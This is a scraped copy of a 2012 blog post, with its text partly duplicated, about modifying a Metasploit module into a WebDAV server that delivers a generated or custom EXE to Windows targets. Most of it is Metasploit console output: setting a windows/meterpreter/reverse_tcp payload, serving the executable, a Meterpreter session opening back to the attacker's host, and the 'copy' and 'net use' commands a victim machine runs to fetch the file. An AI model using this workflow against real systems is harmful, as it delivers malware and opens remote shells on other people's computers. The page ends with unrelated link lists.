WebDAV Server to Download Custom Executable or MSF Generated Executables
来源:互联网 发布:zblog.php安装教程 编辑:程序博客网 时间:2024/05/16 01:27
The current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.
So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.
**Manually execute the exe**
Now if you want to serve a local exe
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first
net use \\ip\documents\ /User:Guest
You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.
code is HERE in the github repo, be gentle i dont usually do exploit code...
-CG
So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.
msf exploit(webdav_file_server) > show optionsModule options (exploit/windows/dev/webdav_file_server): Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS txt yes The list of extensions to generate LOCALEXE false yes Use a local exe instead of generating one based on payload options LOCALFILE myexe.exe yes The filename to serve up LOCALROOT /tmp/ yes The local file path SHARENAME documents yes The name of the top-level share. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / yes The URI to use (do not change).Exploit target: Id Name -- ---- 0 Automatic
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_file_server) > set LHOST 192.168.26.129LHOST => 192.168.26.129smsf exploit(webdav_file_server) > set LPORT 5555LPORT => 5555msf exploit(webdav_file_server) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.26.129:5555[*][*] Exploit links are now available at \\192.168.26.129\documents\[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.26.129:80/[*] Server started.msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)[*] 192.168.26.1:17904 PROPFIND /documents[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)[*] 192.168.26.1:17904 PROPFIND /documents/[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
**Manually execute the exe**
[*] Sending stage (752128 bytes) to 192.168.26.1[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
Now if you want to serve a local exe
msf exploit(webdav_file_server) > jobs -KStopping all jobs...[*] Server stopped.msf exploit(webdav_file_server) > set LOCALEXE TRUELOCALEXE => TRUEmsf exploit(webdav_file_server) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.26.129:5555[*][*] Exploit links are now available at \\192.168.26.129\documents\[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.26.129:80/[*] Server started.msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)[*] 192.168.26.1:17870 PROPFIND /documents[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)[*] 192.168.26.1:17870 PROPFIND /documents/[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
I've tested this on windows 7 and windows XP and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first
net use \\ip\documents\ /User:Guest
You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.
code is HERE in the github repo, be gentle i dont usually do exploit code...
-CG
- WebDAV Server to Download Custom Executable or MSF Generated Executables
- Custom Auto-Generated Sequences with SQL Server
- nodejs download file from server to local
- WebDriverException: Message: 'IEDriverServer.exe' executable needs to be in PATH. Please download fr
- IE custom download manager (IEDownloadManager)
- PhoneGap : unable to download archive from the server
- Connecting to the Portal WebDAV
- Failed to execute WebDAV PROPPATCH
- SAP download 下载错误 Download to server disabled,' 'external command ZMKDIR not defined.
- How to custom search results in SharePoint Server 2013
- Weblogic被管server启动出错:Unable to receive self generated multicast messages
- How To: Download a large, custom set of records from NCBI (pls see http://www.ncbi.nlm.nih.gov/guide
- Can OGG Version 11 Be Used to Pump/Move Trails Generated from Version 9 or 10? (文档 ID 1297283.1)
- Using WebDav to connect to Plone ZODB
- WebDAV
- Webdav
- WebDAV
- WebDAV
- sql中应避免的问题!
- java基础01
- JVM内存管理
- 有关 ORA-00600: internal error code, arguments: [kkqcscpopn_Int: 0] 错误,问题记录
- Linux JNI入门
- WebDAV Server to Download Custom Executable or MSF Generated Executables
- 一个简单的python socket编程
- 手机办公助手1.3版面世
- 每周一荐:学习ACE一定要看的书
- asp.net页面的提交方式POST和GET 区别
- 对UIImage切割
- XP任务栏里的显示桌面 没有了,怎么办?
- IE与火狐对html中table表换行和居中问题,(2012.06.08)
- 关于历史与小说